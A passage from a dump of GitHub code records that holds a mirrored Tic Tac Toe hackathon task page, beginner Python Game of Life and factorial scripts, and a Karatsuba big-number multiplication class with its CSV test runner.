"text": "<html lang=\"en\">\n \n<!-- Mirrored from hack.engeto.com/tasks/tictactoe by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:14 GMT -->\n<!-- Added by HTTrack --><meta http-equiv=\"content-type\" content=\"text/html;charset=UTF-8\" /><!-- /Added by HTTrack -->\n<head>\n <meta charset=\"utf-8\">\n <title>Task: Tic Tac Toe</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <link href=\"../css/bootstrap.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/themify-icons.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/flexslider.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/lightbox.min.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/ytplayer.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/theme.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/custom.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href='http://fonts.googleapis.com/css?family=Lato:300,400%7CRaleway:100,400,300,500,600,700%7COpen+Sans:400,500,600' rel='stylesheet' type='text/css'>\n </head>\n <body>\n <div class=\"main-container\">\n <section class=\"page-title page-title-4\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-md-6\">\n <h3 class=\"uppercase mb0\">Task: Tic Tac Toe</h3>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section class=\"pt0 pb40\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Level:</span>\n <h6 class=\"uppercase mb0\">All Beginners</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Time allocation:</span>\n <h6 class=\"uppercase mb0\">2 - 5 hours</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Lines of code:</span>\n <h6 class=\"uppercase mb0\">50 - 200</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Category:</span>\n <h6 class=\"uppercase mb0\">game</h6>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section>\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Description</h4>\n <p>\n Besides being a German female pop group, Tic Tac Toe is a game for 2 players. Each player can place one mark (or stone) per turn on the 3x3 grid The player who succeeds in placing three of their marks in a horizontal, vertical, or diagonal row wins the game. The marks used are usually 'x' and 'o' for respective players.</p>\n <p>The final aim in this task is that one of the players will be the computer. You will implement an algorithm, that will help the computer to beat the human.</p>\n \n <p>First things first, let's start from the base. These are the basic things your program should be able to do:</p>\n <ul>\n <li>shortly describe game rules</li>\n <li>display the game board</li>\n <li>ask the player #1 to choose the position to take</li>\n <li>display the game board with the newly taken position</li>\n <li>ask the player #2 to choose the position to take</li>\n <li>display the game board with the newly taken position etc.</li>\n </ul>\n The program should be able to assess and inform the user, whether either of the players won the game or the players drew. (Don't forget to terminate the program) \n\n </p>\n\n <p>Once your game can perform the stuff above, try to do the bonus tasks</p>\n \n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Sample usage</h4>\n <p>\n\n </p>\n <p>Converting from decimal to binary:</p>\n <pre>[test@test ]$ ./ttt.py\nWelcome to Tic Tac Toe, the game where ...\n#somewhere here display the game board\nWhat position will you take?\n...\n</pre>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Bonus</h4>\n <p>Include the computer as the second player (who will start the game? Will it be always the same player?)</p>\n <p>Implement minimax algorithm to help the computer to beat the human</p>\n <p>Try to create GUI with Pygame library</p>\n <p>Your game board can be bigger than 3x3. Does your algorithm still work?</p>\n \n </div>\n </div>\n <!--end of row-->\n </section>\n </div>\n <script src=\"../js/jquery.min.js\"></script>\n <script src=\"../js/bootstrap.min.js\"></script>\n <script src=\"../js/flickr.html\"></script>\n <script src=\"../js/flexslider.min.js\"></script>\n <script src=\"../js/lightbox.min.js\"></script>\n <script src=\"../js/masonry.min.js\"></script>\n <script src=\"../js/twitterfetcher.min.js\"></script>\n <script src=\"../js/spectragram.min.js\"></script>\n <script src=\"../js/ytplayer.min.js\"></script>\n <script src=\"../js/countdown.min.js\"></script>\n <script src=\"../js/smooth-scroll.min.js\"></script>\n <script src=\"../js/parallax.js\"></script>\n <script src=\"../js/scripts.js\"></script>\n </body>\n\n<!-- Mirrored from hack.engeto.com/tasks/tictactoe by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:14 GMT -->\n</html>\n"
},
{
"alpha_fraction": 0.5733544826507568,
"alphanum_fraction": 0.6367961764335632,
"avg_line_length": 28.34883689880371,
"blob_id": "2414528cf808c87162d026c542f6cea9b6bc9d74",
"content_id": "60761c5b472925bf8de58037a787825b8275c3fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 43,
"path": "/06_gameoflife/06_gameoflife_disp1.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import pygame, sys, numpy, time\npygame.init() # initialize the pygame system\nsize = (500, 500) # window size is a 2-tuple measured in px\nscreen = pygame.display.set_mode(size)\nmargin=10\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n# Initialize the clock\nclock = pygame.time.Clock()\nmax_fps = 60 # maximum number of cycles (frames) per second\n\n# init test data\n# grid=numpy.zeros((width,height),int)\n# grid[0][2]=1 #glider\n# grid[1][3]=1\n# grid[2][1]=1\n# grid[2][2]=1\n# grid[2][3]=1\n\nwhile True:\n clock.tick(max_fps) # limit the refresh rate to a max of 60 cycles per second\n\n # Quit when the user closes the window\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n # elif event.type == pygame.MOUSEBUTTONDOWN:\n # # Get mouse position whenever it moves\n # mouse_position = event.pos # event.pos is a mouse position 2-tuple\n # print(mouse_position)\n\n\n screen.fill((255, 255, 255)) # RGB white color tuple\n\n # pygame.draw.rect(screen, RED, [50, 50, 20, 20], 1)\n for m in range(10):\n pygame.draw.line(screen, GREEN, [10*m,0], [10*m,100], 1)\n\n pygame.display.flip() # Display what was drawn this turn"
},
{
"alpha_fraction": 0.6995994448661804,
"alphanum_fraction": 0.7036048173904419,
"avg_line_length": 22.4375,
"blob_id": "e7b6f075a8c8e7848978a927d8425f6d9e3bcb1c",
"content_id": "8520dca12fb4398c9d5ea501e8d99fa2c527ec1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 32,
"path": "/03_recursion/03_recursion_01_factorial.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "'''\nIn this exercise, you'll understand the concepts of recursion using selected programs - Fibonacci sequence, Factorial and others. We will also use Turtle graphics to simulate recursion in graphics.\n\nFactorial\nFibonacci\nGreatest common divisor\n\nOnce we understand the principles of recursion, we can do fun stuff with Turtle graphics and DRAW:\n\na square\na nautilus\na spiral\na circles (many circles)\na hexagram\na Koch star\na snowflake\na tree\n'''\n# ------------------\n#factorial\n# ------------------\n\ndef factorial(num_in):\n if num_in<1:\n return 1\n else:\n return_number=num_in*factorial(num_in-1)\n return return_number\n\nfact_in=input('zadej cislo pro vypocet faktorialu: ')\n# print(fact_in)\nprint(factorial(int(fact_in)))"
},
{
"alpha_fraction": 0.4261838495731354,
"alphanum_fraction": 0.4558960199356079,
"avg_line_length": 26.86206817626953,
"blob_id": "56973246dff44692ec31937f80fb92afe920202a",
"content_id": "5c0abe4ea697e741fc78ebbd6c5c505e82da24cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3231,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 116,
"path": "/06_gameoflife/06_gameoflife_disp2_matlab.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import numpy\nimport matplotlib.pyplot as plt\n\n# init test data\n# grid=numpy.zeros((10,10),int)\n# grid[0][2]=1 #glider\n# grid[1][3]=1\n# grid[2][1]=1\n# grid[2][2]=1\n# grid[2][3]=1\n\nf = plt.figure()\nax = f.gca()\nf.show()\n\n# for i in range(30):\n# grid[0][0] += 1\n# plt.imshow(grid,interpolation='none')\n# f.canvas.draw()\n\n\n\n #-------------------------------------------------------------------------\nwidth=50\nheight=50\n# grid = [[0 for x in range(width)] for y in range(height)]\ngrid=numpy.zeros((width,height),int)\n\n# #glider:\ngrid[0][2]=1\ngrid[1][3]=1\ngrid[2][1]=1\ngrid[2][2]=1\ngrid[2][3]=1\n\n#oscilator:\n# grid[2][1]=1\n# grid[2][2]=1\n# grid[2][3]=1\n\nfor step in range(1000):#kroky simulace\n\n # for i in range(len(grid)): #vypise matici\n # print(grid[i])\n plt.cla()\n plt.imshow(grid, cmap=plt.get_cmap('viridis'), interpolation='none') #vykresli matici\n f.canvas.draw()\n\n # input('pauza') #---PAUZA---\n\n grid_new = numpy.zeros((width, height), int) # nova matice (na zacatku vynulovana)\n\n for m in range(width):#po radcich\n for n in range(height):#po sloupcich\n num_of_neighbours=0 #vynulovat pred kazdou novou bunkou\n #\n #operace pro danou bunku:\n #\n\n try:#podivej nahoru\n if grid[m-1][n]==1:\n num_of_neighbours+=1\n except IndexError:\n pass\n\n try: # podivej vpravo nahoru\n if grid[m - 1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo\n if grid[m][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo dolu\n if grid[m+1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej dolu\n if grid[m + 1][n] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo dolu\n if grid[m + 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo\n if grid[m][n-1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo nahoru\n if grid[m - 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n if grid[m][n]==0: #pokud je aktualni bunka mrtva...\n if num_of_neighbours==3: #...ale ma 3 sousedy...\n grid_new[m][n]=1 #... --> ozivit (jinak je defaultne mrtva)\n\n if grid[m][n]==1: #pokud je aktualni bunka ziva...\n if num_of_neighbours==2 or num_of_neighbours==3: #...a ma 2 nebo 3 sousedy...\n grid_new[m][n] = 1 #...nech ji zit (jinak je defaultne mrtva)\n\n grid=numpy.copy(grid_new) #update zakladni grid"
},
{
"alpha_fraction": 0.44137707352638245,
"alphanum_fraction": 0.4667099714279175,
"avg_line_length": 26.01754379272461,
"blob_id": "6f04f70f8182b4355f22d1c0bdeabb9621b1ac9a",
"content_id": "e6643e6d2f84428bbeca1aa96cd035b806629d8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3079,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 114,
"path": "/testy.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import numpy\n\nwidth=5\nheight=5\n# grid = [[0 for x in range(width)] for y in range(height)]\ngrid=numpy.zeros((width,height),int)\n\n# print(len(grid))\n\ngrid[0][2]=1\ngrid[1][3]=1\ngrid[2][1]=1\ngrid[2][2]=1\ngrid[2][3]=1\n\n# grid=numpy.zeros((5,5),int)\n# print(grid[1][1])\n\n# grid2=numpy.copy(grid)\n# grid3=numpy.copy(grid)\n#\n# grid2[4][4]=5\n#\n# grid=numpy.copy(grid2)\n\n# for i in range(len(grid)):\n# print(grid[i])\n\n# num_of_neighbours <2 --> DIE\n# num_of_neighbours >3 --> DIE\n# num_of_neighbours 2 or 3 --> LIVE\n# num_of_neighbours == 3 --> RESSURECT (if dead)\n\n# input('pauza')\n#\nfor step in range(10):#kroky simulace\n\n for i in range(len(grid)): #vykresli matici\n print(grid[i])\n\n input('pauza') #---PAUZA---\n\n grid_new = numpy.zeros((width, height), int) # nova matice (na zacatku vynulovana)\n\n for m in range(height):#po radcich\n for n in range(width):#po sloupcich\n num_of_neighbours=0 #vynulovat pred kazdou novou bunkou\n #\n #operace pro danou bunku:\n #\n\n try:#podivej nahoru\n if grid[m-1][n]==1:\n num_of_neighbours+=1\n except IndexError:\n pass\n\n try: # podivej vpravo nahoru\n if grid[m - 1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo\n if grid[m][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo dolu\n if grid[m+1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej dolu\n if grid[m + 1][n] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo dolu\n if grid[m + 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo\n if grid[m][n-1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo nahoru\n if grid[m - 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n if grid[m][n]==0: #pokud je aktualni bunka mrtva...\n if num_of_neighbours==3: #...ale ma 3 sousedy...\n grid_new[m][n]=1 #... --> ozivit (jinak je defaultne mrtva)\n\n if grid[m][n]==1: #pokud je aktualni bunka ziva...\n if num_of_neighbours==2 or num_of_neighbours==3: #...a ma 2 nebo 3 sousedy...\n grid_new[m][n] = 1 #...nech ji zit (jinak je defaultne mrtva)\n\n grid=numpy.copy(grid_new) #update zakladni grid\n\n\n# try:\n# grid[100]\n# except IndexError:\n# print('au')"
},
{
"alpha_fraction": 0.611707329750061,
"alphanum_fraction": 0.6614634394645691,
"avg_line_length": 30.090909957885742,
"blob_id": "b9d39bef6ad2f96012a29e02a7b4c06a135b0ea9",
"content_id": "fe00264466c52eaad711cc60169f2a63feeda214",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 33,
"path": "/06_gameoflife/06_gameoflife_02.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import pygame, sys, time\npygame.init() # initialize the pygame system\nsize = (500, 500) # window size is a 2-tuple measured in px\nscreen = pygame.display.set_mode(size)\nmargin=10\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n# Initialize the clock\nclock = pygame.time.Clock()\nmax_fps = 60 # maximum number of cycles (frames) per second\n\nwhile True:\n clock.tick(max_fps) # limit the refresh rate to a max of 60 cycles per second\n\n # Quit when the user closes the window\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # Get mouse position whenever it moves\n mouse_position = event.pos # event.pos is a mouse position 2-tuple\n print(mouse_position)\n\n\n screen.fill((255, 255, 255)) # RGB white color tuple\n\n # screen.blit(tile, (200, 100)) # Draw the tile on the screen\n\n pygame.display.flip() # Display what was drawn this turn"
}
] | 11 |
AnZuCa/Karatsuba | https://github.com/AnZuCa/Karatsuba | 8ddba18d1805f45c36c569f59e3cc349b49d2658 | 39de0013a97a3276c941241fb8c000fbbbc80513 | fe31dffbdc33b30436f8d8720f1e3ce3eb8c06bb | refs/heads/master | 2022-06-25T06:33:36.207288 | 2020-05-05T21:44:22 | 2020-05-05T21:44:22 | 261,589,348 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4768112301826477,
"alphanum_fraction": 0.49285534024238586,
"avg_line_length": 31.805084228515625,
"blob_id": "0440b94ee9bfd821aea7cd1a143bbe4aae7f5555",
"content_id": "b293038b98798c9bb958f2a245a2b042fe1ffb09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3989,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 118,
"path": "/Karatsuba/src/Knum.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\r\nfrom Num import *\r\n#Autores:\r\n#Andres Zuniga Calderon(10am)\r\n#Braslyn Rodriguez (8am)\r\n#grupo:04-10am\r\n\r\n\r\n\r\nclass Knum(Num):\r\n \r\n def __mul__(self,other): \r\n \"\"\"Funcion de karatsuba es mas eficiente que una multiplicacion de escuela\r\n Multiplica dos Knum con el algoritmo de karatsuba\r\n \r\n self = [2,5] other = [5,0] n = max entre self y other , nby2 = n//2 si es impar se suma 1\r\n \r\n despues se dividen self a la mitad y other tmabien en a,b para self y c,d para other\r\n a[2] , b[5], c[5], d=[0]\r\n \r\n ac = a * c = [2] * [5]\r\n = [1,0]\r\n\r\n bd = b * d = [5] * [0] \r\n = [0] \r\n \r\n k = ( a + b) * (c + d) - ac - bd = ([2]+[5]) * ([5]+[0]) - [1,0] - [0] = [2,5]\r\n \r\n \r\n return (ac << ((n-nby2)*2)) + (k << (n-nby2)) + bd = [1,0,0,0] + [2,5,0] + [0] = [1,2,5,0] \r\n \r\n \r\n \"\"\"\r\n self.Verificaciones(other)\r\n if len(self) == 1 or len(other) == 1:\r\n numero = copy.copy(super().__mul__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n else:\r\n #si se desea que el programa funcione con negativos se deben implementar las siguientes instrucciones \r\n if self.Complemento and other.Complemento:\r\n return ~self * ~other\r\n elif self.Complemento:\r\n return ~(~self * other)\r\n elif other.Complemento:\r\n return ~(self * ~ other)\r\n n = max(len(self),len(other))\r\n nby2 = n // 2\r\n if n % 2 != 0:\r\n nby2 += 1\r\n self_copy = copy.copy(self.ListaN[self.size-n:])\r\n other_copy= copy.copy(other.ListaN[self.size-n:])\r\n a = type(self)(self_copy[:nby2],self.base,self.Complemento)\r\n b = type(self)(self_copy[nby2:],self.base,self.Complemento)\r\n c = type(other)(other_copy[:nby2],other.base,other.Complemento)\r\n d = type(other)(other_copy[nby2:],other.base,other.Complemento)\r\n ac = a * c\r\n bd = b * d\r\n k = (a + b) * (c + d) - ac - bd\r\n return (ac << ((n-nby2)*2)) + (k << (n-nby2)) + bd\r\n\r\n \r\n \r\n def __invert__(self):\r\n return super().__invert__()\r\n\r\n\r\n def __getitem__(self,index):\r\n return super().__getitem__(index) \r\n\r\n\r\n def __len__(self):\r\n return super().__len__()\r\n\r\n def __le__(self,other):\r\n return super().__le__(other)\r\n\r\n \r\n def __gt__(self,other):\r\n return super().__gt__(other)\r\n\r\n\r\n def __repr__(self):\r\n return super().__repr__()\r\n\r\n \r\n def __lshift__(self,positions):\r\n numero = copy.copy(super().__lshift__(positions))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n\r\n def __rshift__(self,positions):\r\n numero = copy.copy(super().__rshift__(positions))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n def __eq__(self, other):\r\n return super().__eq__(other)\r\n Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n \r\n def __add__(self,other):\r\n numero = copy.copy(super().__add__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n \r\n def __floordiv__(self,other):\r\n numero = copy.copy(super().__floordiv__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n \r\n def __mod__(self,other):\r\n numero = copy.copy(super().__mod__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento) \r\n \r\n def __pow__(self,other):\r\n numero = copy.copy(super().__pow__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n\r\n def __sub__(self,other):\r\n numero = copy.copy(super().__sub__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)"
},
{
"alpha_fraction": 0.4989231824874878,
"alphanum_fraction": 0.5204594135284424,
"avg_line_length": 32.024391174316406,
"blob_id": "4b85876744bb61516994250230fada697c503bd9",
"content_id": "0140cf110a2e3507b7524d1014c7123fb6900a54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 41,
"path": "/Karatsuba/src/Pruebas_csv.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nfrom read_test_cases import *\r\n\r\ndef Prueba():\r\n \"\"\"\r\n Funcion para ejecutar el read_test_cases.py con nuestros casos pruebas se le\r\n envian dos parametro el csv y el tipo de caso que va a ejecutar\r\n \r\n cada uno de los csv realizados para esta prueba estan hechos \r\n para que siempre todos los casos esten correctos\r\n \"\"\"\r\n print(\"-----------------Casos para Suma-------------------\")\r\n lectura(\"../test/test_suma.csv\",\"+\")\r\n print()\r\n print(\"-----------------Casos para Resta-------------------\")\r\n lectura(\"../test/test_resta.csv\",\"-\")\r\n print()\r\n print(\"-----------------Casos para Multiplicacion-------------------\")\r\n lectura(\"../test/test_multiplicacion.csv\",\"*\")\r\n print()\r\n print(\"-----------------Casos para Division-------------------\")\r\n lectura(\"../test/test_Division.csv\",\"//\")\r\n print()\r\n print(\"-----------------Casos para Mod-------------------\")\r\n lectura(\"../test/test_mod.csv\",\"%\")\r\n print()\r\n print(\"-----------------Casos para Exponente-------------------\")\r\n lectura(\"../test/test_exponente.csv\",\"**\")\r\n print()\r\n print(\"Pruebas Finalizadas\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #Aqui llamos a Prueba encargado de ejecutarme cada una de las pruebas con los .CSV\r\n Prueba()"
},
{
"alpha_fraction": 0.46718770265579224,
"alphanum_fraction": 0.5066702365875244,
"avg_line_length": 37.764076232910156,
"blob_id": "a0f46c1fe1253cb5b61fcfe6f17eee3c7e20d8ee",
"content_id": "83baab8c7a6f5af88ca5629f245dcd2267d0125e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14848,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 373,
"path": "/Karatsuba/src/Num.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nfrom CheckNum import *\r\nimport copy\r\n\r\n\r\nclass Num:\r\n base=10\r\n size=16\r\n cadena=\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n def __init__(self,numero,Base = 10,complemento = False):\r\n \"\"\"\r\n convierte los numeros del compilador a numeros propios de la clase verifica que esten en la base \r\n y que el tamaño no exceda 16\r\n \"\"\"\r\n \r\n if CheckNum.Check(numero,Base) and CheckNum.Size(numero):\r\n self.Complemento = complemento\r\n self.base=Base\r\n if type(numero) == list: \r\n self.ListaN = copy.copy(numero)\r\n self.ListaN = [0]* (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n else:\r\n self.ListaN = CheckNum.ConvertListtoint(str(numero))\r\n self.ListaN = [0] * (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n \r\n def __invert__(self):\r\n \"\"\"\r\n Funcion que crea el complemento\r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1] base 10\r\n \r\n Se toma esa lista y se va comparando cuanto le falta a cada numero para ser \r\n igual a la base - 1\r\n \r\n se obtiene [9,9,9,9,9,9,9,9,9,9,9,9,9,9,8]\r\n \r\n Uso la sobrecarga del operador + para sumarle uno a la lista\r\n \r\n Resultado final [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9] \r\n \r\n \"\"\"\r\n listaInv = []\r\n for i in range(self.size):\r\n listaInv.append(self.base-1 - self[i])\r\n if self.Complemento == True:\r\n return Num(listaInv,self.base,False) + Num(1,self.base,False)\r\n return Num(listaInv,self.base,True) + Num(1,self.base,False)\r\n \r\n def Negativos(self):\r\n \"\"\"\r\n Funcion encargada de mostrar un negativo al usuario\r\n Convierte una lista a su respectivo entero si es base menor que 10 o mayor o igual que 10 \r\n ejemplo \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,3,3,3]\r\n \r\n al convertirlo a entero obtenemos 333 \r\n finalmente se le concatena un \"-\" al inicio\r\n \r\n \"\"\"\r\n aux = copy.copy(~self)\r\n if self.base < 11: return int(\"-\" + str(aux.int()))\r\n else: return \"-\" + self.base_mayor_10()\r\n \r\n \r\n def show_number(self):\r\n \"\"\"\r\n Funcion encargada de mostrar los numeros al usuario\r\n Devuelve el numero positivo o negativo\r\n \"\"\"\r\n if self.Complemento:\r\n return self.Negativos()\r\n else:\r\n if self.base < 11:\r\n return self.int()\r\n else:\r\n return self.base_mayor_10()\r\n \r\n def base_mayor_10(self):\r\n \"\"\"\r\n Funcion encargada de transformar un numero en base mayor a 10 con sus respectivas letras dependiendo de la base\r\n primero se recorre la lista para ver su tamaño ya que puede tener numero mayores o iguales a 10 \r\n despues de eso se corta esa lista en una mas pequeña donde estan todos los numeros sin los ceros adelante\r\n despues concateno cada uno de los numeros transformado a su base con una variable cadena que está al principio\r\n \r\n ejemplo\r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,5,10] que vendria siendo igual a 5A en base 16\r\n \r\n el resultado seria \"5A\"\r\n \r\n \"\"\"\r\n if self.Complemento: self_copy = copy.copy(~self)\r\n else: self_copy = copy.copy(self)\r\n numero = \"\"\r\n contador = 0\r\n while self_copy[contador] == 0 and contador<15:\r\n contador+=1\r\n new = []\r\n new = self_copy.ListaN[contador:16]\r\n for i in new:\r\n numero += self.cadena[i] \r\n return numero \r\n \r\n def __eq__(self,other):\r\n \"\"\"Sobrecarga de == que verifica si dos Num son iguales\"\"\"\r\n return self.int() == other.int()\r\n def __ne__(self,other):\r\n \"\"\"\r\n sobrecarga del operador != devuelve un true si self y other son diferentes\r\n de lo contrario devuelve false\r\n \"\"\"\r\n return str(self.show_number()) != str(other.show_number())\r\n \r\n def int(self):\r\n \"\"\"\r\n Muestra la lista como numeros del compilador\r\n \"\"\"\r\n if self.base > 10:\r\n return self.base_mayor_10()\r\n aux=0\r\n inc=1\r\n for i in range(len(self.ListaN)):\r\n aux+=self.ListaN[-(i+1)]*inc\r\n inc*=10\r\n return aux\r\n\r\n def __getitem__(self,index):\r\n \"\"\"\r\n Muetra los numeros dentro de la lista (eje invertido \"Provicional\")\r\n \"\"\"\r\n return self.ListaN[index]\r\n\r\n\r\n def __len__(self):\r\n \"\"\"\r\n Retorna el tamaño del digito que esta en la lista, si es negativo devuelve 16\r\n \"\"\"\r\n if self.Complemento:return self.size\r\n return(len(str(self.int())))\r\n def __le__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador <= me indica si other es mayor o igual que self\r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True:return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() <= other.int(): return True \r\n return False\r\n \r\n def __gt__(self,other):\r\n \"\"\"\r\n Esta sobrecarga > sirve para mostrar \r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True: return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() > other.int():return True \r\n return False \r\n\r\n def __repr__(self):\r\n \"\"\"\r\n aprovecha la funcion int para mostrar los valores por string\r\n \"\"\"\r\n return f\"(Valor: {self.show_number()}) (Base:{self.base}) (Max:10 **{self.size}) \\n\"#{self.ListaN}\r\n \r\n def __lshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la izquierda <<\r\n Toma un Num y lo corre cierta cantidad de positions a la izq \r\n ejemplo toma la lista \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,5]\r\n y siendo positions por ejemplo igual a 1\r\n el resultado seria \r\n [0,0,0,0,0,0,0,0,0,0,0,0,1,5,0]\r\n \r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list = []\r\n list = aux.ListaN + [0] * positions\r\n aux.ListaN=list[len(list)-self.size:len(list)]\r\n return aux\r\n def __rshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la derecha >>\r\n Toma un Num y lo corre cierta cantidad de positions a la izq \r\n ejemplo toma la lista \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,5]\r\n y siendo positions por ejemplo igual a 1\r\n el resultado seria \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1]\r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list=[]\r\n list = [0]* positions + aux.ListaN \r\n aux.ListaN = list[0:self.size]\r\n return aux \r\n \r\n def __eq__(self, 